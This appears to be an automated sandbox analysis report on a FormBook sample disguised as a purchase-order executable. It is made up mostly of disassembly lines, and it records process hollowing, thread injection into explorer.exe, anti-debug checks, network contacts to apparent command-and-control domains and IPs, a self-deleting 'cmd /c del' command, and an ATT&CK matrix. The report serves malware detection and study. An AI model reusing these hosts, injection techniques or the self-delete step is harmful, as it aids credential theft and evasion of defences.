          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B070D mov eax, dword ptr fs:[00000030h]3_2_013B070D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B070D mov eax, dword ptr fs:[00000030h]3_2_013B070D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131A70E mov eax, dword ptr fs:[00000030h]3_2_0131A70E
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131A70E mov eax, dword ptr fs:[00000030h]3_2_0131A70E
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012FFF60 mov eax, dword ptr fs:[00000030h]3_2_012FFF60
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B8F6A mov eax, dword ptr fs:[00000030h]3_2_013B8F6A
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012FEF40 mov eax, dword ptr fs:[00000030h]3_2_012FEF40
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01367794 mov eax, dword ptr fs:[00000030h]3_2_01367794
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01367794 mov eax, dword ptr fs:[00000030h]3_2_01367794
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01367794 mov eax, dword ptr fs:[00000030h]3_2_01367794
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F8794 mov eax, dword ptr fs:[00000030h]3_2_012F8794
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013237F5 mov eax, dword ptr fs:[00000030h]3_2_013237F5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0139FE3F mov eax, dword ptr fs:[00000030h]3_2_0139FE3F
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EE620 mov eax, dword ptr fs:[00000030h]3_2_012EE620
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131A61C mov eax, dword ptr fs:[00000030h]3_2_0131A61C
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0131A61C mov eax, dword ptr fs:[00000030h]3_2_0131A61C
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EC600 mov eax, dword ptr fs:[00000030h]3_2_012EC600
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EC600 mov eax, dword ptr fs:[00000030h]3_2_012EC600
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012EC600 mov eax, dword ptr fs:[00000030h]3_2_012EC600
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01318E00 mov eax, dword ptr fs:[00000030h]3_2_01318E00
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013A1608 mov eax, dword ptr fs:[00000030h]3_2_013A1608
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F766D mov eax, dword ptr fs:[00000030h]3_2_012F766D
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130AE73 mov eax, dword ptr fs:[00000030h]3_2_0130AE73
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130AE73 mov eax, dword ptr fs:[00000030h]3_2_0130AE73
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130AE73 mov eax, dword ptr fs:[00000030h]3_2_0130AE73
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130AE73 mov eax, dword ptr fs:[00000030h]3_2_0130AE73
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0130AE73 mov eax, dword ptr fs:[00000030h]3_2_0130AE73
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F7E41 mov eax, dword ptr fs:[00000030h]3_2_012F7E41
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F7E41 mov eax, dword ptr fs:[00000030h]3_2_012F7E41
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F7E41 mov eax, dword ptr fs:[00000030h]3_2_012F7E41
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F7E41 mov eax, dword ptr fs:[00000030h]3_2_012F7E41
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F7E41 mov eax, dword ptr fs:[00000030h]3_2_012F7E41
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F7E41 mov eax, dword ptr fs:[00000030h]3_2_012F7E41
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013AAE44 mov eax, dword ptr fs:[00000030h]3_2_013AAE44
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013AAE44 mov eax, dword ptr fs:[00000030h]3_2_013AAE44
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013646A7 mov eax, dword ptr fs:[00000030h]3_2_013646A7
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B0EA5 mov eax, dword ptr fs:[00000030h]3_2_013B0EA5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B0EA5 mov eax, dword ptr fs:[00000030h]3_2_013B0EA5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B0EA5 mov eax, dword ptr fs:[00000030h]3_2_013B0EA5
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0137FE87 mov eax, dword ptr fs:[00000030h]3_2_0137FE87
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_012F76E2 mov eax, dword ptr fs:[00000030h]3_2_012F76E2
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013116E0 mov ecx, dword ptr fs:[00000030h]3_2_013116E0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013B8ED6 mov eax, dword ptr fs:[00000030h]3_2_013B8ED6
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_01328EC7 mov eax, dword ptr fs:[00000030h]3_2_01328EC7
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_0139FEC0 mov eax, dword ptr fs:[00000030h]3_2_0139FEC0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_013136CC mov eax, dword ptr fs:[00000030h]3_2_013136CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532AD30 mov eax, dword ptr fs:[00000030h]16_2_0532AD30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05333D34 mov eax, dword ptr fs:[00000030h]16_2_05333D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053EE539 mov eax, dword ptr fs:[00000030h]16_2_053EE539
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F8D34 mov eax, dword ptr fs:[00000030h]16_2_053F8D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053AA537 mov eax, dword ptr fs:[00000030h]16_2_053AA537
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05354D3B mov eax, dword ptr fs:[00000030h]16_2_05354D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05354D3B mov eax, dword ptr fs:[00000030h]16_2_05354D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05354D3B mov eax, dword ptr fs:[00000030h]16_2_05354D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534C577 mov eax, dword ptr fs:[00000030h]16_2_0534C577
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534C577 mov eax, dword ptr fs:[00000030h]16_2_0534C577
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05347D50 mov eax, dword ptr fs:[00000030h]16_2_05347D50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05363D43 mov eax, dword ptr fs:[00000030h]16_2_05363D43
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A3540 mov eax, dword ptr fs:[00000030h]16_2_053A3540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053D3D40 mov eax, dword ptr fs:[00000030h]16_2_053D3D40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05351DB5 mov eax, dword ptr fs:[00000030h]16_2_05351DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05351DB5 mov eax, dword ptr fs:[00000030h]16_2_05351DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05351DB5 mov eax, dword ptr fs:[00000030h]16_2_05351DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F05AC mov eax, dword ptr fs:[00000030h]16_2_053F05AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F05AC mov eax, dword ptr fs:[00000030h]16_2_053F05AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053535A1 mov eax, dword ptr fs:[00000030h]16_2_053535A1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535FD9B mov eax, dword ptr fs:[00000030h]16_2_0535FD9B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535FD9B mov eax, dword ptr fs:[00000030h]16_2_0535FD9B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05352581 mov eax, dword ptr fs:[00000030h]16_2_05352581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05352581 mov eax, dword ptr fs:[00000030h]16_2_05352581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05352581 mov eax, dword ptr fs:[00000030h]16_2_05352581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05352581 mov eax, dword ptr fs:[00000030h]16_2_05352581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05322D8A mov eax, dword ptr fs:[00000030h]16_2_05322D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05322D8A mov eax, dword ptr fs:[00000030h]16_2_05322D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05322D8A mov eax, dword ptr fs:[00000030h]16_2_05322D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05322D8A mov eax, dword ptr fs:[00000030h]16_2_05322D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05322D8A mov eax, dword ptr fs:[00000030h]16_2_05322D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053D8DF1 mov eax, dword ptr fs:[00000030h]16_2_053D8DF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533D5E0 mov eax, dword ptr fs:[00000030h]16_2_0533D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533D5E0 mov eax, dword ptr fs:[00000030h]16_2_0533D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053EFDE2 mov eax, dword ptr fs:[00000030h]16_2_053EFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053EFDE2 mov eax, dword ptr fs:[00000030h]16_2_053EFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053EFDE2 mov eax, dword ptr fs:[00000030h]16_2_053EFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053EFDE2 mov eax, dword ptr fs:[00000030h]16_2_053EFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6DC9 mov eax, dword ptr fs:[00000030h]16_2_053A6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6DC9 mov eax, dword ptr fs:[00000030h]16_2_053A6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6DC9 mov eax, dword ptr fs:[00000030h]16_2_053A6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6DC9 mov ecx, dword ptr fs:[00000030h]16_2_053A6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6DC9 mov eax, dword ptr fs:[00000030h]16_2_053A6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6DC9 mov eax, dword ptr fs:[00000030h]16_2_053A6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535BC2C mov eax, dword ptr fs:[00000030h]16_2_0535BC2C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6C0A mov eax, dword ptr fs:[00000030h]16_2_053A6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6C0A mov eax, dword ptr fs:[00000030h]16_2_053A6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6C0A mov eax, dword ptr fs:[00000030h]16_2_053A6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6C0A mov eax, dword ptr fs:[00000030h]16_2_053A6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F740D mov eax, dword ptr fs:[00000030h]16_2_053F740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F740D mov eax, dword ptr fs:[00000030h]16_2_053F740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F740D mov eax, dword ptr fs:[00000030h]16_2_053F740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534746D mov eax, dword ptr fs:[00000030h]16_2_0534746D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053BC450 mov eax, dword ptr fs:[00000030h]16_2_053BC450
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053BC450 mov eax, dword ptr fs:[00000030h]16_2_053BC450
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535A44B mov eax, dword ptr fs:[00000030h]16_2_0535A44B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533849B mov eax, dword ptr fs:[00000030h]16_2_0533849B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E14FB mov eax, dword ptr fs:[00000030h]16_2_053E14FB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6CF0 mov eax, dword ptr fs:[00000030h]16_2_053A6CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6CF0 mov eax, dword ptr fs:[00000030h]16_2_053A6CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6CF0 mov eax, dword ptr fs:[00000030h]16_2_053A6CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F8CD6 mov eax, dword ptr fs:[00000030h]16_2_053F8CD6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535E730 mov eax, dword ptr fs:[00000030h]16_2_0535E730
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05324F2E mov eax, dword ptr fs:[00000030h]16_2_05324F2E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05324F2E mov eax, dword ptr fs:[00000030h]16_2_05324F2E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534F716 mov eax, dword ptr fs:[00000030h]16_2_0534F716
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053BFF10 mov eax, dword ptr fs:[00000030h]16_2_053BFF10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053BFF10 mov eax, dword ptr fs:[00000030h]16_2_053BFF10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F070D mov eax, dword ptr fs:[00000030h]16_2_053F070D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F070D mov eax, dword ptr fs:[00000030h]16_2_053F070D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535A70E mov eax, dword ptr fs:[00000030h]16_2_0535A70E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535A70E mov eax, dword ptr fs:[00000030h]16_2_0535A70E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533FF60 mov eax, dword ptr fs:[00000030h]16_2_0533FF60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F8F6A mov eax, dword ptr fs:[00000030h]16_2_053F8F6A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533EF40 mov eax, dword ptr fs:[00000030h]16_2_0533EF40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05338794 mov eax, dword ptr fs:[00000030h]16_2_05338794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A7794 mov eax, dword ptr fs:[00000030h]16_2_053A7794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A7794 mov eax, dword ptr fs:[00000030h]16_2_053A7794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A7794 mov eax, dword ptr fs:[00000030h]16_2_053A7794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053637F5 mov eax, dword ptr fs:[00000030h]16_2_053637F5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053DFE3F mov eax, dword ptr fs:[00000030h]16_2_053DFE3F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532E620 mov eax, dword ptr fs:[00000030h]16_2_0532E620
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535A61C mov eax, dword ptr fs:[00000030h]16_2_0535A61C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535A61C mov eax, dword ptr fs:[00000030h]16_2_0535A61C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532C600 mov eax, dword ptr fs:[00000030h]16_2_0532C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532C600 mov eax, dword ptr fs:[00000030h]16_2_0532C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532C600 mov eax, dword ptr fs:[00000030h]16_2_0532C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05358E00 mov eax, dword ptr fs:[00000030h]16_2_05358E00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1608 mov eax, dword ptr fs:[00000030h]16_2_053E1608
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534AE73 mov eax, dword ptr fs:[00000030h]16_2_0534AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534AE73 mov eax, dword ptr fs:[00000030h]16_2_0534AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534AE73 mov eax, dword ptr fs:[00000030h]16_2_0534AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534AE73 mov eax, dword ptr fs:[00000030h]16_2_0534AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534AE73 mov eax, dword ptr fs:[00000030h]16_2_0534AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533766D mov eax, dword ptr fs:[00000030h]16_2_0533766D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05337E41 mov eax, dword ptr fs:[00000030h]16_2_05337E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05337E41 mov eax, dword ptr fs:[00000030h]16_2_05337E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05337E41 mov eax, dword ptr fs:[00000030h]16_2_05337E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05337E41 mov eax, dword ptr fs:[00000030h]16_2_05337E41
          Source: C:\Users\user\Desktop\PO 56720012359.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exe; Process queried: DebugPort
          Source: C:\Users\user\Desktop\PO 56720012359.exe; Code function: 3_2_00409B30 LdrLoadDll
          Source: C:\Users\user\Desktop\PO 56720012359.exe; Code function: 1_2_008B40F0 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\PO 56720012359.exe; Code function: 1_2_008B4121 SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\PO 56720012359.exe; Code function: 3_2_008B40F0 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\PO 56720012359.exe; Code function: 3_2_008B4121 SetUnhandledExceptionFilter,UnhandledExceptionFilter

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Network Connect: 156.252.96.170 80
          Source: C:\Windows\explorer.exe; Domain query: www.fmodesign.com
          Source: C:\Windows\explorer.exe; Domain query: www.healthy-shack.com
          Source: C:\Windows\explorer.exe; Domain query: www.arerasols.com
          Source: C:\Windows\explorer.exe; Network Connect: 154.81.100.18 80
          Source: C:\Windows\explorer.exe; Network Connect: 107.180.44.148 80
          Source: C:\Windows\explorer.exe; Domain query: www.mobilewz.com
          Source: C:\Windows\explorer.exe; Network Connect: 23.252.68.226 80
          Source: C:\Windows\explorer.exe; Domain query: www.stuntfighting.com

          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\PO 56720012359.exe; Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 1210000

          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\PO 56720012359.exe; Section loaded: unknown target: C:\Users\user\Desktop\PO 56720012359.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO 56720012359.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO 56720012359.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO 56720012359.exe; Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO 56720012359.exe; Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\PO 56720012359.exe; Thread APC queued: target process: C:\Windows\explorer.exe

          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\PO 56720012359.exe; Thread register set: target process: 3472
          Source: C:\Users\user\Desktop\PO 56720012359.exe; Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\cscript.exe; Thread register set: target process: 3472

          Source: C:\Users\user\Desktop\PO 56720012359.exe; Process created: C:\Users\user\Desktop\PO 56720012359.exe 'C:\Users\user\Desktop\PO 56720012359.exe'
          Source: C:\Windows\SysWOW64\cscript.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO 56720012359.exe'
          Source: explorer.exe, 00000005.00000000.314610609.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.509351340.0000000003BB0000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.314610609.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.509351340.0000000003BB0000.00000002.00020000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.314610609.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.509351340.0000000003BB0000.00000002.00020000.sdmp; Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000005.00000000.255386675.0000000001128000.00000004.00000020.sdmp; Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000005.00000000.314610609.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.509351340.0000000003BB0000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000005.00000000.314610609.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.509351340.0000000003BB0000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\PO 56720012359.exe; Code function: 1_2_008B74BC cpuid
          Source: C:\Users\user\Desktop\PO 56720012359.exe; Code function: 1_2_008B3A01 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Service Execution 2 | Windows Service 3 | Windows Service 3 | Masquerading 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Shared Modules 1 | Application Shimming 1 | Process Injection 512 | Virtualization/Sandbox Evasion 2 | LSASS Memory | Security Software Discovery 151 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Application Shimming 1 | Process Injection 512 | Security Account Manager | Virtualization/Sandbox Evasion 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 2 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
